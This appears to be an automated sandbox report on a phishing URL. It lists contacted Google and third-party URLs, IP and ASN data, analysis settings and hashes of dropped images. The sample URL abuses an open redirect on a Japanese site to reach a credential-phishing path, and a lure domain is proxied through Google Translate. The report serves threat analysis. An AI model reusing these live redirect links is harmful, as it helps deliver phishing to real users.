                                                                                              https://www.youtube.com/s/player/59acb1f3/player_ias.vflset/en_US/embed.jsfalse
                                                                                                high
                                                                                                https://translate.google.com/about/static/compiled/index.min.css?cache=d2c5574false
                                                                                                  high
                                                                                                  https://lh3.googleusercontent.com/dd86GfBmU80zX_gBKX8vD3jcolry9sjlvguaakt0t7oc8jZtX3XUUyDMyDSvIhEIobxWhNnjm1DsTU5E6q3I_WoKgfOYLhDzTMF8dm59Kpg0gLhxn8Mfalse
                                                                                                    high
                                                                                                    https://www.youtube.com/embed/EqboAI-Vk-U?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=3false
                                                                                                      high
                                                                                                      https://lh3.googleusercontent.com/Bo4-9K6wiEyWZr1x4IfvOeB_NFv8MGC8kqmS--hCUaR0B0puSgikWbDppKEeYSd2bxdhPT9wfcSPdX35aIjShic_UaI8AnK9kUrE1ZVWlg=s660false
                                                                                                        high
                                                                                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                                          high
                                                                                                          https://www.youtube.com/generate_204?YAveBAfalse
                                                                                                            high
                                                                                                            https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j99&tid=UA-69658807-1&cid=2144369805.1679378274&jid=741649625&gjid=1091984817&_gid=2074760332.1679378274&_u=YEBAAAAAAAAAACgBY~&z=1851098630false
                                                                                                              high
                                                                                                              https://www.youtube.com/embed/ZRCdORJiUgU?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=7false
                                                                                                                high
                                                                                                                https://www.google.com/logos/doodles/2016/icc-sri-lanka-v-west-indies-4888550698909696-hp2x.jpgfalse
                                                                                                                  high
                                                                                                                  https://www.youtube.com/generate_204?Yx10ZAfalse
                                                                                                                    high
                                                                                                                    https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en&client=wtfalse
                                                                                                                      high
                                                                                                                      https://translate.google.com/_/TranslateWebserverUi/data/batchexecute?rpcids=zKAP2e&source-path=%2F&f.sid=-8198649470166742175&bl=boq_translate-webserver_20230319.08_p0&hl=en&soc-app=1&soc-platform=1&soc-device=1&_reqid=82648&rt=cfalse
                                                                                                                        high
                                                                                                                        https://www.youtube.com/embed/SAIEamakLoY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=23false
                                                                                                                          high
                                                                                                                          https://www.google.com/logos/doodles/2022/nowruz-2022-6753651837109194.2-2x.pngfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/logos/doodles/2019/netherlands-elections-2019-5158774833676288-2x.pngfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/logos/doodles/2019/nowruz-2019-6284808622702592-2x.jpgfalse
                                                                                                                                high
                                                                                                                                https://lh3.googleusercontent.com/1lqAjjXuM384j0EfDi9U8Y1AfDe6nru7uxUwfMH-vyeD2aQLqvhxh8FuWbqfb-zhjhuSyljoATt1NjEGmRCbjbFE6XA1Fdb_oHWJNgGMxwFp_Dha8Eofalse
                                                                                                                                  high
                                                                                                                                  https://lh3.googleusercontent.com/5ZZkQavSKPzPcj4vg-8DqCs2qofs9BZIzfFtSeY8NlqF4d0bWophZMqW4SSg-MKquK6C5VBTC9dXE1YS5PkUXjlIY9GLFaiLBO3_ywWzKiEqGn_cgQMTfalse
                                                                                                                                    high
                                                                                                                                    https://about.google/assets-stories-2021/css/index.min.css?cache=9e0af63false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.youtube.com/embed/vI4LHl4yFuo?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=11false
                                                                                                                                      high
                                                                                                                                      https://www.youtube.com/generate_204?642dMgfalse
                                                                                                                                        high
                                                                                                                                        https://lh3.googleusercontent.com/hXMSnnnK17inbOjeyLqFBx3HrKFKdAJlO0cuhNdwe3Yz0O4axkn9ULNFcaEi_zbL_oKUs3VvZM6sAVUB_-gwzDrLwN-ahxnefG0IYhA=s660false
                                                                                                                                          high
                                                                                                                                          https://about.google/favicon.icofalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.youtube.com/s/player/59acb1f3/player_ias.vflset/en_US/remote.jsfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/logos/doodles/2019/fall-equinox-2019-southern-hemisphere-5334567442448384-2x.pngfalse
                                                                                                                                              high
                                                                                                                                              https://www.youtube.com/embed/Lv-sY_z8MNs?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=19false
                                                                                                                                                high
                                                                                                                                                https://lh3.googleusercontent.com/wCGOhL6icJWSXcsnHRdh9OYFq7sksI8mbSz9Dy2dWn4QBEt_46Recz7sZTjLZOfZ4oOOwQj0WZEW2GjUKChL3CpGQcAIt0L2PqQVwNdsJeTtNeyf9b0?=w1440false
                                                                                                                                                  high
                                                                                                                                                  https://lh3.googleusercontent.com/hyqlKj6FYj8yAzPaJZB7cfknhp-7J4SY9rv3NRrQi7ox0HJiZKzUyqKGg6x7xXGmAO_ALYY2Ud--hoKC0sKY51sDCTu6yOMz-3TkpmQ=s660false
                                                                                                                                                    high
                                                                                                                                                    https://www.youtube.com/embed/xY_MUB8adEQ?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=21false
                                                                                                                                                      high
                                                                                                                                                      https://support.google.com/translate/?hl=enfalse
                                                                                                                                                        high
                                                                                                                                                        https://lh3.googleusercontent.com/effFMzq4XvfrZPK0E_tvDivy7b-Kd2-Cmd8TvA-maCZK35whczbTdegzCTQBeA46bhHMIy0Eujntwy2v9vqSBDu-_nT-8eZJerDmkwpV=s660false
                                                                                                                                                          high
                                                                                                                                                          https://lh3.googleusercontent.com/QEMbwo7Ti8RLlXgjwI3XmLofgQarTUsJhdlzW3qmjsweqEBVZQybyhODbfGRBJKkpnbEkzZUxCMBcqATjh5XFT6SsxA46apOCAbnRUWmitINMI_VT5w?=w1440=w1440-l90-sg-rj-c0xfffffffalse
                                                                                                                                                            high
                                                                                                                                                            https://lh3.googleusercontent.com/W02GUnHtaJPHRSBIq-gNVwuGPX9s4KcNRuen0qIqjAhxQgTZPoA5l3bs_K-dOeEhDWsLHHzANblqcGHaKRU-58O_0VGUJuRld3LCDpHDb4atFHUnIOz9false
                                                                                                                                                              high
                                                                                                                                                              https://www.youtube.com/generate_204?wnr66gfalse
                                                                                                                                                                high
                                                                                                                                                                https://support.google.com/translate/?hl=en-USfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/logos/doodles/2023/tunisia-national-day-2023-6753651837109852-2xa.giffalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.google.com/logos/doodles/2020/recognizing-ignaz-semmelweis-and-handwashing-6753651837108746.2-2xa.giffalse
                                                                                                                                                                      high
                                                                                                                                                                      https://lh3.googleusercontent.com/DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsORIkB5ttL61Xa-pea_bzBqQf1FvTtqwIhPslB34qDfvvb9hp3A=w1440-l90-sg-rj-c0xfffffffalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/logos/doodles/2019/tunisia-national-day-2019-5078217890201600.2-2xa.giffalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.google.com/translate/?hl=en#topic=7011755false
                                                                                                                                                                            high
                                                                                                                                                                            https://translate.google.com/false
                                                                                                                                                                              high
                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                              https://lh3.googleusercontent.com/EICyRNLJhOmFUAfdDXw9x4mQAeefUSSZyYNNVxLzCO6q7VfCIMG9faB3-q8aSqz6xtchromecache_449.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ogs.google.com/chromecache_509.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://stats.g.doubleclick.net/g/collectchromecache_719.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://support.google.com&quot;chromecache_509.1.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    low
                                                                                                                                                                                    https://apis.google.com/js/client.jschromecache_588.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://support.google.comchromecache_543.1.dr, chromecache_509.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://policies.google.com/privacy?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footerchromecache_449.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://ogs.google.com/widget/calloutchromecache_509.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-linkchromecache_449.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://policies.google.com/technologies/cookieschromecache_509.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://safety.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-linkchromecache_449.1.drfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.youtube.comchromecache_626.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://github.com/twbs/bootstrap/graphs/contributors)chromecache_484.1.dr, chromecache_486.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://support.google.com/translate/chromecache_543.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://admin.youtube.comchromecache_493.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://lh3.googleusercontent.com/sarNvJGsElTyskguj3eBs8jWOiO3GZzu0FTOotLbaVX4D9Wt17OLO7MRdFiedqYyzjchromecache_449.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://lh3.googleusercontent.com/DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsOchromecache_449.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://services.google.com/fb/submissions/cwgsignup/chromecache_720.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://content-googleapis-test.sandbox.google.comchromecache_588.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://yurt.corp.google.comchromecache_493.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.google.com/tools/feedbackchromecache_588.1.dr, chromecache_601.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pchromecache_720.1.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://lh3.googleusercontent.com/m-Ok3vfGKDPtv6u7QjPVLMFAw1rXk28qMAEujh1qRxXf4eHUZlVsV27Sqgqh7Ck98Ychromecache_449.1.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.youtube.com/generate_204?cpn=chromecache_493.1.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://sandbox.google.com/inapp/%chromecache_588.1.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://about.google/chromecache_449.1.drfalse
                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://apis.google.com/js/api.jschromecache_599.1.dr, chromecache_448.1.dr, chromecache_467.1.dr, chromecache_642.1.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://support.google.com/communities/answer/7424249chromecache_543.1.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://feedback2-test.corp.google.com/tools/feedback/%chromecache_588.1.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://transparencyreport.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=foochromecache_449.1.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://shopping.google.com/?nord=1?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footerchromecache_449.1.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://sandbox.google.com/tools/feedback/%chromecache_588.1.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://tools.ietf.org/html/rfc1950chromecache_493.1.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://content-googleapis-staging.sandbox.google.comchromecache_588.1.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://lens.google/?hl=chromecache_549.1.drfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_484.1.dr, chromecache_499.1.dr, chromecache_486.1.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://stats.g.doubleclick.net/g/collect?v=2&chromecache_719.1.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://abc.xyz/investor/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-linkchromecache_449.1.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://careers.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-linkchromecache_449.1.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://lh3.googleusercontent.com/4OMr0tkN-puVthzh9N6e028DIaYljPtm3HD-WZXJ7i1PijG206V92KtvEIUytIinK9chromecache_449.1.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://lh3.googleusercontent.com/-tJ0exa-sFRDGwxCfFtT3kaKnhcmHAvtjqHDP41VZhmjMHrNxR7jTkuXxHlonYHF-0chromecache_449.1.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://www.google.com/log?format=json&hasfast=truechromecache_543.1.dr, chromecache_599.1.dr, chromecache_448.1.dr, chromecache_467.1.dr, chromecache_493.1.drfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          https://support.google.com/inapp/%chromecache_588.1.drfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                            142.250.203.118
                                                                                                                                                                                                                                                            i.ytimg.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            142.250.203.115
                                                                                                                                                                                                                                                            ghs-svc-https-sni.ghs-ssl.googlehosted.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            142.250.203.97
                                                                                                                                                                                                                                                            photos-ugc.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            54.36.145.173
                                                                                                                                                                                                                                                            www.moneycointv.comFrance
                                                                                                                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                                                                                                                            172.217.168.65
                                                                                                                                                                                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            142.250.203.98
                                                                                                                                                                                                                                                            googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            142.250.203.109
                                                                                                                                                                                                                                                            accounts.google.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            108.177.96.155
                                                                                                                                                                                                                                                            stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            216.239.32.29
                                                                                                                                                                                                                                                            about.googleUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            104.17.24.14
                                                                                                                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            142.250.203.100
                                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            216.58.215.225
                                                                                                                                                                                                                                                            remittanceadvice--details-glitch-me.translate.googUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            165.100.216.103
                                                                                                                                                                                                                                                            www.rxjapan.jpJapan10006SECOMTRUSTSECOMTrustSystemsCoLtdJPfalse
                                                                                                                                                                                                                                                            104.18.11.207
                                                                                                                                                                                                                                                            stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            172.217.168.78
                                                                                                                                                                                                                                                            plus.l.google.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            172.217.168.14
                                                                                                                                                                                                                                                            youtube-ui.l.google.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                                                            172.217.168.17
                                                                                                                                                                                                                                                            csp.withgoogle.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            172.217.168.38
                                                                                                                                                                                                                                                            static.doubleclick.netUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                                            192.168.2.1
                                                                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                                                            Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                                                                                                                                            Analysis ID:830992
                                                                                                                                                                                                                                                            Start date and time:2023-03-20 22:55:49 +01:00
                                                                                                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                            Overall analysis duration:0h 6m 39s
                                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                            Sample URL:https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com
                                                                                                                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:16
                                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                            • HDC enabled
                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                            Classification:mal64.phis.win@43/383@28/22
                                                                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                                                                            HDC Information:Failed
                                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                            • Browse: https://translate.google.com/
                                                                                                                                                                                                                                                            • Browse: https://translate.google.com/?hl=en&tab=TT
                                                                                                                                                                                                                                                            • Browse: https://translate.google.com/about/?hl=en-US
                                                                                                                                                                                                                                                            • Browse: https://support.google.com/translate/?hl=en-US
                                                                                                                                                                                                                                                            • Browse: https://www.google.com/about?hl=en-US
                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.203.99, 34.104.35.123, 172.217.168.10, 69.16.175.42, 69.16.175.10, 142.250.203.106, 172.217.168.42, 172.217.168.74, 216.58.215.234, 142.250.203.110, 142.250.203.104, 216.239.34.36, 216.239.32.36, 216.58.215.240, 172.217.168.16, 142.250.203.112
                                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fonts.googleapis.com, cds.s5x3j6q5.hwcdn.net, ssl.gstatic.com, fs.microsoft.com, content-autofill.googleapis.com, storage.googleapis.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, jnn-pa.googleapis.com, region1.google-analytics.com, edgedl.me.gvt1.com, www.googletagmanager.com, translate.googleapis.com, update.googleapis.com, www.gstatic.com, www.google-analytics.com
                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                            No simulations
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):112878
                                                                                                                                                                                                                                                            Entropy (8bit):7.998421039109912
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:MBBZgMZFT3DmrB+TRca8BvGNI8e4h0aZUmDETMTN+h91:MBBxF+1+dcacsHh0aZUHCIT1
                                                                                                                                                                                                                                                            MD5:2C552A69258A146C1C4197F438B39748
                                                                                                                                                                                                                                                            SHA1:8F6CEA713916639064228090459EE59729E16EA7
                                                                                                                                                                                                                                                            SHA-256:01A77669AFCD35FCCD433EE1272A36C4DA7721B9E14805B7BC5D5E0606E078EE
                                                                                                                                                                                                                                                            SHA-512:E542D8698D0D64FCCB81CA938E693B7BA40306269C092F538796E91EE7831A5B6B31A92BC09A238E0E6526AE1F1022AAC9868790AA63D550EB247498F0F52E09
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:RIFF...WEBPVP8 ...0g...*....>m2.G$#$.(......ce..........B..9....G.>x...*....G.~..O.:...}cG....3.#..h....OE............S..;.{g.o`/.P.k:v...../......:?r......}'..3...v.....NX.....k...o..R?.....~....g|*...7.S..]w./....i.....f......._....{.S././.?.~g..C.O.\....~n.]......@...7.O.~..E.6..........N..x_...~..g.................z....?...z........7.g......./..c..*... ...AD...z..{de.5J...K.w..We..._.]....a..9...)..2.Y.A...h!....-....q....3z..j.. E.vA...N....U9T.}xK.#.?.w.P..bQ-..p[^>x.*z....@.Vr....z.......=6....5......)...........fqw...mt...8..}....V8.:..zz...Ak.....H.G...)..Jq.4,......O.3.._*..mm...n!.^Ej.....B..Vg..+.FXv....,.y>O...{..v...i.,.+..Xv..0.9.....\.).5..Z.q...T....\.N...by......[....m.....,Y?.s]W..>...........n0i..f.(..........._.G..8.L....0...<.......8.H......|...nbL'03N.)~a.m.HBJnr....t%y..Q...me....ou.wK.)8..z..Z=G.r....JL..Y..=.L..<.%...@..e...r.....b9..9>.c..\auC?..tDW....|7K...xXncK1.wK.g....-u.....A....:I...\<}QUN.......?....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2789
                                                                                                                                                                                                                                                            Entropy (8bit):7.876679673763755
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:bZvAZM8NJso+Pcrav20EyR1PrmWUu83ZTXl+12002Eu228SeSpdtHuCgFGACU+l4:uM8Np+PSazE+8Wa3ZTV+1200j2Be4cCw
                                                                                                                                                                                                                                                            MD5:3BE8EFD4E69D96C9D60FB1B85CFC8268
                                                                                                                                                                                                                                                            SHA1:0421D28D1C4A9E3393D6ABB41FE91D1B1C9D7D7C
                                                                                                                                                                                                                                                            SHA-256:69B9ED7346F9A8BA12DA5B61E29EF72CF3409CE7257F89C201E2671A54BB8036
                                                                                                                                                                                                                                                            SHA-512:0C43894792B7230A0563CA17ABE8CDAAD86ED34BA6B8AB7C69078665570B3484B7B92272421040F2D7D6406E382A86C5280637CAECF07F2D536A3D9B70C90931
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...@...@......iq.....IDATx..Et.I.@k..o.{.....cff.33..-4........b&.hn..Q..&.jJr...z.Ki...PU.......>n...:.bJ.....w.....O.1..Ir.$.....wD..x@..u.&..?...O.1...Od...5..D.H.;.q.s.\>.....+.%...&&w.~......... J.........@......Q.w.W^......w5!J..............Q.w.e.>..e.~.....@.|..?3&......[D.....@...B&.j..(..;`1..~y.....z..(... ...W.. q...o.......@......n.glB c....r.-..RQYY/..ZDSs.hi.......7yill.......-UU5+SSS..(.w0NKZ......t....U.........v.9ZaJ).,.NX.....;..vp.|......k?...v......4.>1.....Ea.U..P@..}....v...(<.+...)\(..&.c...>....r.T........$;H.p94..EE..i.jF...&.a..K..9...9FQTl...S...0.4...........L.|I.'xX.N.8..l.0).K*..2H.ePh.Y`..W)E.....v.`..v..L.q....NuA...~.....O...w{...h.N.K...D]]]..$2.......,...2..u....6Bn.Y.......R.(+..,?H.HT.....~...D...9...$..x.1.&QPH.......#h..~..E.,O...).g.+....8..4..p.xfAyy9E.G..sT.6..O.x..{}..`x.).....;..6'.....G./.7..h..J.D.....3z.D<Id.....H.e._`.f.z..y....S.8q..O_..O.....^.......p#.]*........A)....f...;c.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 950 x 380
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):959644
                                                                                                                                                                                                                                                            Entropy (8bit):7.9283345880488225
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:WDhC8qxVOibS/1NZl4Wk6Ek3xPmyrBWfFk431OxFrNgGNb8xRqqXS1slekwHGqhN:ShIZbWpEkhPNqii1yfQUiS2lN6kk+u
                                                                                                                                                                                                                                                            MD5:2AD13BE7E919595F5A785D7569F20060
                                                                                                                                                                                                                                                            SHA1:72953CDE188A88C4E99B407AAF2FD6FB1647F5FC
                                                                                                                                                                                                                                                            SHA-256:F7FBA5B02119EB62F02411873790F512B4F754AA4FCF536FB8FF68B0911EF017
                                                                                                                                                                                                                                                            SHA-512:C4FD47B8F6EE0BCA773557528DE307767C4AB168F307AEE3D15D9B711363A12A2221EDB658AEB24050E2909030AE599C87C9B78E30D401BA563EF4454DBA5608
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2021/fall-2021-southern-hemisphere-6753651837108888-2xa.gif
